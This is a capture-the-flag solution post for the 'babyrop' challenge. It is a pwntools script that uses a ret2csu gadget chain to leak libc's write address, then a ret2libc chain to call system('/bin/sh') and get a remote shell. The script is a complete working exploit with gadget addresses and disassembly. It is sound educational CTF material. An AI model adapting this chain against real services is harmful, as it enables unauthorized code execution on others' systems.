Tags: ret2libc ret2csu pwn rop 

Rating: 2.0

```
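from pwn import *
context.terminal = ['terminator', '-e']
context.update(arch='amd64', os='linux')
context.log_level = 'debug'

# Target binary plus the libc build every offset below is derived from.
# The libc MUST be the one the remote service actually runs: libc_base and
# the system/"/bin/sh" addresses are only valid for this exact build, so if
# the leak does not match it, look the leaked address up in a libc database.
e = context.binary = ELF('/home/fex0r/.ctf/dicega/babyrop/babyrop', checksec=False)
p = remote('dicec.tf', 31924)
libc = ELF('./libc6_2.31-0ubuntu9.1_amd64.so', checksec=False)

# Bytes up to the saved return address (buffer + saved rbp, per the author).
# p64() returns bytes, so the padding has to be bytes too - a str here raises
# TypeError on Python 3 pwntools.
padding = b'A' * 72

# Gadgets in __libc_csu_init (disassembly below) and the write PLT/GOT slots.
# All of these are fixed because the binary is not position independent.
poprdi = p64(0x00000000004011d3)
poprsir15 = p64(0x00000000004011d1)
popr14_r15 = p64(0x00000000004011d0)
mov_rdx_r14 = p64(0x00000000004011b0)
write_got = p64(0x404018)
write_plt = p64(0x401030)
main = p64(e.sym.main)
pop_rbx_rbp_r12_r13_r14_r15 = p64(0x4011ca)

'''
0x00000000004011b0 <+64>: mov rdx,r14
0x00000000004011b3 <+67>: mov rsi,r13
0x00000000004011b6 <+70>: mov edi,r12d
0x00000000004011b9 <+73>: call QWORD PTR [r15+rbx*8] # calls the _fini pointer (0x402e38)
0x00000000004011bd <+77>: add rbx,0x1
0x00000000004011c1 <+81>: cmp rbp,rbx
0x00000000004011c4 <+84>: jne 0x4011b0 <__libc_csu_init+64>
0x00000000004011c6 <+86>: add rsp,0x8
0x00000000004011ca <+90>: pop rbx
0x00000000004011cb <+91>: pop rbp
0x00000000004011cc <+92>: pop r12
0x00000000004011ce <+94>: pop r13
0x00000000004011d0 <+96>: pop r14
0x00000000004011d2 <+98>: pop r15
0x00000000004011d4 <+100>: ret

r14>rdx
r13>rsi
'''

# The call gadget dereferences r15 + rbx*8.  With rbx = 1 and
# r15 = 0x402e30 that is [0x402e38], a pointer to _fini that is safe to call.
#r15 + rbx*8 = r15 + 8
#0x402e38 - 8 = 0x402e30

### RET2CSU ###
# Stage 1: write(1, &write_got, 8) - leak write's libc address.
#
# 1. pop-six gadget: rbx=1, rbp=2, r12=0, r13=0, r14=8, r15=0x402e30
# 2. mov gadget: rdx=r14=8, rsi=r13=0, edi=r12d=0, call [r15+rbx*8] (_fini)
#    rbx becomes 2 == rbp so the loop is not taken; add rsp,8 then six pops
#    consume the seven filler qwords that follow.
# 3. rdi=1 and rsi=&write_got are set with the short gadgets, then
#    write@plt runs with rdx still 8, and we return to main for stage 2.
xpl  = padding
xpl += pop_rbx_rbp_r12_r13_r14_r15 + p64(1) + p64(2) + p64(0) + p64(0) + p64(0x8) + p64(0x402e30)
xpl += mov_rdx_r14
xpl += p64(1) + p64(2) + p64(0) + p64(0) + p64(0x8) + p64(0) + p64(0)   # add rsp,8 + six pops
xpl += poprdi + p64(1)
xpl += poprsir15 + write_got + p64(0)
xpl += write_plt + main

p.read()            # drain the banner/prompt before sending
p.sendline(xpl)

# The leak is exactly 8 bytes; recvn(8) waits for all of them, whereas
# read()[0:8] may come back short on a slow link and break u64().
write_leaked = u64(p.recvn(8))

success('Leaked write => 0x%x'%(write_leaked))

libc_base = write_leaked - libc.sym.write
success('libc_base => 0x%x'%(libc_base))

# A real libc base is page aligned; anything else means the remote libc is
# not the build we loaded (or the leak was garbage) and every address
# computed from it would be wrong.  Stop here rather than crash the target.
if libc_base & 0xfff:
    error('libc_base is not page aligned - wrong libc build or bad leak')

libc.address = libc_base
bin_sh = next(libc.search(b'/bin/sh'))   # bytes pattern (Python 3 pwntools)
system = libc.sym.system
info('system => 0x%x'%(system))
info('bin_sh => 0x%x'%(bin_sh))

# Stage 2: classic ret2libc, system("/bin/sh").
# NOTE(review): `main` occupies the slot where a plain `ret` gadget usually
# goes for 16-byte stack alignment before system().  Returning into main runs
# it once more, so the first line typed into interactive() feeds that extra
# run and only main's own return lands on pop rdi / system - this depends on
# main's epilogue leaving rsp on the rest of the chain; a `ret` gadget would
# avoid the extra round-trip.  Confirm against the binary before relying on it.
xpl = padding + main + poprdi + p64(bin_sh) + p64(system)

p.sendline(xpl)

p.interactive()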
```